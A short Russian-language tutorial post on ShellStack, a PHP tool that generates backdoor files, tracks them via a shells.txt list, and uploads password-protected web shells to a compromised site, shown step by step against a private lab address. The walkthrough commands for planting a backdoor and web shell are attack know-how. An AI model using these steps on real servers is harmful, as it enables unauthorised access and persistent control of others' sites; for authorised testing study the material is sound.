Приветствую! Здесь речь пойдет о ShellStack – это инструмент на PHP, его предназначением является, менеджмент бэкдоров на целевом сайте.

Под словом менеджмент, я подразумеваю управление, создание, загрузка на целевой хост.



ShellStack - этот инструмент подходит для пентестеров, которые хотят отслеживать каждое движение на сайте, который они взламывают. Инструмент генерирует бэкдор-файл, который вам просто нужно загрузить на сайт, и поместить URL-адрес backdoor’a в файл shells.txt, присутствующий в каталоге инструмента.

Клонируем инструмент на свою машину с Github.

> git clone https://github.com/Tuhinshubhra/shellstack

> cd shellstack




Запускаем:


> php shellstack.php





Теперь необходимо сгенерировать backdoor, пишем команду:

> generatebd



Выходим из программы Ctrl+C.

В папке с ShellStack находим backdoor.php и загружаем его на целевой сервер.



Копируем URL нашего backdoor:



И вставляем его в файл shells.txt:

> echohttp://172.16.0.223/pentest/backdoor.php> shells.txt




Запускаем ShellStack:


> php shellstack.php

Видим, что наш бэкдор находится под номером 0. Выбираем его для запуска.


> 0





Открывается список доступных действий:



Узнаем немного больше о целевом хосте:

> 2



Теперь можно загрузить шелл, которым потом воспользуемся для получения дополнительных плюшек:

> 1




Обращаем внимание на то, что у каждого шелла есть пароль/логин.

Теперь, обращаемся на целевой хост по адресу находящегося там шелла, он загружается туда автоматически:



> 172.16.0.223/pentest/kurama.php

Вводим пароль к шеллу и попадаем в административную панель:



Дальше, посредством этих красных кнопочек делаем с сервером/сайтом, что позволит нам воображение/благоразумие.

Спасибо за внимание.